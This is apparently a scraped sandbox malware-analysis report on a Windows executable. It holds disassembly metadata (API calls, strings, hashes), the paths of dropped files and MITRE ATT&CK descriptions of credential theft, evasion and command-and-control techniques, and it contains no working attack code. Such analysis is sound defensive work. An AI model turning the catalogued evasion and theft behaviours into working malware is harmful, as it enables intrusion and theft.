Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0+
API String ID: 3712363035-3911041397
Opcode ID: 9533d0e8f7e945abebf067da196e6897f92dcee1a736564fd76e0a70a6a21d27
Instruction ID: d837f2bd9ebe6dd81bfda9e84093b6b1f1857c72b33999a6fc6edbc18caf8b45
Opcode Fuzzy Hash: 9533d0e8f7e945abebf067da196e6897f92dcee1a736564fd76e0a70a6a21d27
Instruction Fuzzy Hash: 7AF05EB2650300BBE320BB61BC4DFB73A5CDF04750F004865BB0CD51A2D675AA6487B8

Function 0026747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00267493
_wcslen.LIBCMT ref: 002674B9

Strings

3, 3, 16, 1, xrefs: 00267483

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 6c3000541e03b02903cc892539bfd1b7af90584a14fc97aae9284f60ee3296ad
Instruction ID: d0831741815558ea428f1d596a7e5b29aadfefd69a5af1cf6a5c49e342666bf7
Opcode Fuzzy Hash: 6c3000541e03b02903cc892539bfd1b7af90584a14fc97aae9284f60ee3296ad
Instruction Fuzzy Hash: 8FE02B4623536111D3312679BCC5A7F5699DFC6B50710183BFE81C22A7EE948DF193A0

Function 00240B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00240B23

Strings

Error allocating memory., xrefs: 00240B1C
AutoIt, xrefs: 00240B17

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 9831cb85d16ed8e8712adcb5d338faacf9f83446a251ac4f51c4e8cb32a7ea6c
Instruction ID: 24db7e16eaafc556ff15176d1ae5a22cbfe1f57fb8107fc87e93f26dffe4cb07
Opcode Fuzzy Hash: 9831cb85d16ed8e8712adcb5d338faacf9f83446a251ac4f51c4e8cb32a7ea6c
Instruction Fuzzy Hash: D5E0D83225431866D31437A47C43F9A7A848F16B64F20442EF74C594C38FE124B006ED

Function 00200D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001FF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00200D71,?,?,?,001E100A), ref: 001FF7CE

IsDebuggerPresent.KERNEL32(?,?,?,001E100A), ref: 00200D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001E100A), ref: 00200D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00200D7F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 25437c073cc533e09e0b6cd18fa5a3fef4c0c75a7d8bc7ced8ccc20effea5ba5
Instruction ID: 42159df071093d21d290142bf3444fbdbac4bc5b191576d5655e33c33a8fd9c0
Opcode Fuzzy Hash: 25437c073cc533e09e0b6cd18fa5a3fef4c0c75a7d8bc7ced8ccc20effea5ba5
Instruction Fuzzy Hash: 2EE092702107518BE3709FB8E9483467BE0EF04740F008A2DE88AC7696EBF0E4948BA1

Function 001FE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001FE3D5

Strings

0%+, xrefs: 001FE3B5
8%+, xrefs: 001FE3CA

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%+$8%+
API String ID: 1385522511-2501399898
Opcode ID: 68168e0c4c4df10b89ecf0b93b9acfdb528f7e4b7d0345d4b5e09a0903dd94a5
Instruction ID: c38f8cd36fc4fee6b24cc61cd9ea1487bd19dde2a0fd70aa31760ed08d93b824
Opcode Fuzzy Hash: 68168e0c4c4df10b89ecf0b93b9acfdb528f7e4b7d0345d4b5e09a0903dd94a5
Instruction Fuzzy Hash: 82E08631424B18CBDB3C9718BAADAE83395FB05720B919665E613871E29B3128458B65

Function 0023D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0023D220

Strings

X64, xrefs: 0023D2A8
%.3d, xrefs: 0023D22B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: b4a4f1ebff8e5f762903b60d093c3c8177c673bbe3137c5550ea26e7d0340638
Instruction ID: fd524dc898b57371361d265229d0ddcc074f4a173a25ca2264552936feeaa2b9
Opcode Fuzzy Hash: b4a4f1ebff8e5f762903b60d093c3c8177c673bbe3137c5550ea26e7d0340638
Instruction Fuzzy Hash: 08D012F1828118EACB9096E0FC498BBB37CAB19301F608456FD06D1042DB74D5686761

Function 00272322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0027232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0027233F

Part of subcall function 0024E97B: Sleep.KERNEL32 ref: 0024E9F3

Strings

Shell_TrayWnd, xrefs: 00272325

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b05aa102759f1d957fb2fcc0cffaf73722b953ec810c04af0a046cea8d399206
Instruction ID: cc147a1bf6edc5f6f87da179ff5367cad6b195e95d856fef8a8ffb7a7757931d
Opcode Fuzzy Hash: b05aa102759f1d957fb2fcc0cffaf73722b953ec810c04af0a046cea8d399206
Instruction Fuzzy Hash: 5ED012763E4310B7E66CB770EC4FFC6BA18AB41B10F15491AB749AA1D0CAF0A851CE54

Function 00272356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0027236C
PostMessageW.USER32(00000000), ref: 00272373

Part of subcall function 0024E97B: Sleep.KERNEL32 ref: 0024E9F3

Strings

Shell_TrayWnd, xrefs: 00272365

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 28794e811cb8c1c96f5635390df308785d9822c79dc090dab6c99dde04781900
Instruction ID: c163bdb2e08e81829b22dcae6b6e572360e96ce118ada1697acfec5ae01e888a
Opcode Fuzzy Hash: 28794e811cb8c1c96f5635390df308785d9822c79dc090dab6c99dde04781900
Instruction Fuzzy Hash: 02D0C9723E1310BBE668A770AC4FFC6A618AB45B10F55491AB649AA1D0CAA0A8518A54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report smQoKNkwB7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\04EL04J45

C:\Users\user\AppData\Local\Temp\aut4A8A.tmp

C:\Users\user\AppData\Local\Temp\aut4DA8.tmp

C:\Users\user\AppData\Local\Temp\chordates

C:\Users\user\AppData\Local\Temp\ectosphere

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
smQoKNkwB7.exe

Function 001E42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 001E42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00222BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 001E2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00218D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Function 0022065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 001E344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 001E2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 001E3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 00D673D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 001E2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00D671C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138
fileCOMMON

Function 00252947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre